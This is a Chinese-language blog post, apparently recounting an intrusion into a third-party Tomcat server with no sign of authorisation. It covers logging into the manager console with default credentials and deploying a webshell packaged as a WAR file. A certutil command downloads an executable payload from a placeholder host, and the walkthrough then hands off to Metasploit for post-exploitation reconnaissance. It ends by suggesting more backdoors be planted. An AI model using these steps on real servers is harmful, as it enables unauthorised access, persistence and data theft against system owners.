浅析:TomCat Getshell拿服务器权限实战
0xOO前言
无意中接触到一个网站 所以索性尝试一下
没什么技术性 都是一些基本操作 大佬看看就可以了奥
注:由于保密问题 所有关于对方信息网址等各项信息都将保密打上马赛克 能打的都打上马赛克
0x00
tomcat默认有个manager的管理后台app,密码存放在conf/tomcat-users.xml里面。如果tomcat是外网开放的,那么这个manager服务也是开放的,http://主机:端口/manager/html 可以看看是不是通的
0x01
首先我尝试一下默认账号admin 密码为空 发现可以进去 那真是太好了
登录进去之后
可以看到有一个上传war部署项目的
那么就用IDEA 打包一个webshell大马 部署进去即可
首先需要一个自备的webshell大马
随便找一个
然后打开IDEA创建一个项目
一直Next即可
然后把webshell拷贝到scr目录
选择Project Structure
选择Artifacts 然后再选择web Application: Archive
打勾include in project build 然后点击 号选择module Output
选择项目即可
然后选择build
选择build Artifacts
完事之后呢
上传部署即可
点击Deploy之后就可以看到
多了一个xssx
那么访问那个目录即可
命令执行 ipconfig
可以看到内网 192.168.0.128
Net user
0x02
权限移交MetaSploit(Msf)
尝试使用shellcode制作payload
编译后利用webshell上传到服务器
有最快捷的方法把payload上传到服务器( 记得一定要内网穿透哦 )
- 第一种就是使用CMD的命令certutil(然后使用CMD命令运行即可)
命令:certutil -urlcache -split -f https://www.xxx.com/test.EXE
2.第二种就是使用webshell的上传(同理,使用CMD命令运行PAYLOAD)
首先使用webshell来到服务器的C:\Windows\System32\目录下,然后uploadfile
Jie.exe就是我们上传的payload
那么直接使用CMD命令运行(命令:start C:WindowsSystem32jie.exe)
内网的IP为192.168.0.128
0x03
信息收集
1.查看路由
2.查看系统信息
3.进入CMD命令行 然后Net User查看用户
4.调用post/windows/gather/dumplinks 来查看最近访问的文件
5.调用post/windows/gather/enum_applications 来查看目标主机安装软件的信息
然后可以选择多放几个后门 或者 提交漏洞!